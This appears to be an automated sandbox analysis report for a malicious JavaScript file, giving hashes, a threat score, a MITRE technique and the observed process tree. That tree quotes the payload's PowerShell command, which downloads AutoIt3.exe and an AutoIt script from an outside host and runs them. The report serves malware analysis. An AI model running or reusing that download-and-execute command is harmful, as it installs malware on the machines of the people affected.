27ad82073f21316b59443e53a8f76ded797fadff3e1ef74c968dd84914671778

Analysis

max time kernel
121s
max time network
142s
platform
windows7_x64
resource
win7-20231025-en
resource tags

arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
submitted
07-11-2023 14:40

Target

5f475d11b0914f11.js
Size

254KB
MD5

40e1292e9b1fe1a88b32b99e3ca9f72f
SHA1

5a0403673919d994412f4635998e8f8a3ac315a8
SHA256

00f25f4e27938650e42747fc5b85d87e040d8c79db82c72ccf05ca03c8d32771
SHA512

3ed3109bd47fe056f01a5c6cb912addf2a90e9e55e1c412d3641d42335f80058594e2294b5c4cb6fd6d728add7a03115807595c87a4ff32149e93624dbad8e67
SSDEEP

6144:Ne7hgXeerjqlI2Iro+qg3e7hgXeerjqlI2Iro+8:NIhgSlI23tKIhgSlI23V

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2132	powershell.exe
2132	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2132	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 524 wrote to memory of 2132	524	wscript.exe	29
PID 524 wrote to memory of 2132	524	wscript.exe	29
PID 524 wrote to memory of 2132	524	wscript.exe	29

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\5f475d11b0914f11.js
1⤵
- Suspicious use of WriteProcessMemory
PID:524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://8sjimonstersboonkonline.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://8sjimonstersboonkonline.com:2351/msiasfgadcz' -OutFile 'asfgadcz.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'asfgadcz.au3'"; Stop-Process -Name "WScript"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2132

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/2132-4-0x000000001B230000-0x000000001B512000-memory.dmp

Filesize
2.9MB

Download
memory/2132-5-0x0000000002090000-0x0000000002098000-memory.dmp

Filesize
32KB

Download
memory/2132-6-0x000007FEF51D0000-0x000007FEF5B6D000-memory.dmp

Filesize
9.6MB

Download
memory/2132-7-0x0000000002950000-0x00000000029D0000-memory.dmp

Filesize
512KB

Download
memory/2132-8-0x0000000002950000-0x00000000029D0000-memory.dmp

Filesize
512KB

Download
memory/2132-9-0x0000000002950000-0x00000000029D0000-memory.dmp

Filesize
512KB

Download
memory/2132-10-0x000007FEF51D0000-0x000007FEF5B6D000-memory.dmp

Filesize
9.6MB

Download
memory/2132-11-0x000007FEF51D0000-0x000007FEF5B6D000-memory.dmp

Filesize
9.6MB

Download